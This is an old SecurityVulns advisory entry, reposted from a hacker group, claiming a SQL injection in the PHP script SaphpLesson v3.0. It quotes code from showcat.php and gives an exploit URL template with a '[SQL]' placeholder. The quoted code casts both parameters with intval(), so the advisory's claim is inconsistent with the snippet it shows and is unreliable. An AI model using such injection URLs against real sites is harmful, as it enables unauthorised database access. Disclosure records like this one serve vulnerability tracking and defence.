SaphpLesson v3.0 SQL Injection Exploit

2007-02-22T00:00:00
ID SECURITYVULNS:DOC:16150
Type securityvulns
Reporter Securityvulns
Modified 2007-02-22T00:00:00

Description

//////////////////2007///////////////////// //SaphpLesson v3.0 SQL Injection Exploit// //////////////////////////////////////////

Found by:SwEET-DeViL&HaCKeR sUn# TeaM AL-GaRNi------------------# Application : SaphpLesson------# version : v3.0-----------------# URL : No-----------------------#


Line 19'/'23 of showcat.php || ---------------<? || $forumid = intval($_GET["forumid"]); || || $Page = intval($_GET["Page"]); || || $tit = mysql_query("select Title,CatID from forums where id=$forumid"); || ?>-----------------------------------------------------------------------------

ExploiTs :- """""""""" http://www.Site.com/Path/showcat.php?forumid=1&Page=-1[SQL]);#

/'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''/ END __K-S-A_____ |ЬЬЬЬЬЬTeam AL-GaRNiЬЬЬЬЬЬЬЬЬЬЬ| ::::::::::::::::::::::::::::::::: ::-###########-----###########-:: ::-###########-----###########-:: ::-###-------------###-----###-:: ::-###-------------###########-:: ::-###---######----###########-:: ::-###---##-###----###--###----:: ::-###------###----###---###---:: ::-############----###----###--:: ::-############----###----###--:: ::::::::::::::::::::::::::::::::: |ЬЬЬЬЬgamr-14@hotmail.comЬЬЬЬЬЬЬ| |ЬЬЬЬЬЬЬЬЬm-o-t@msn.comЬЬЬЬЬЬЬЬЬ|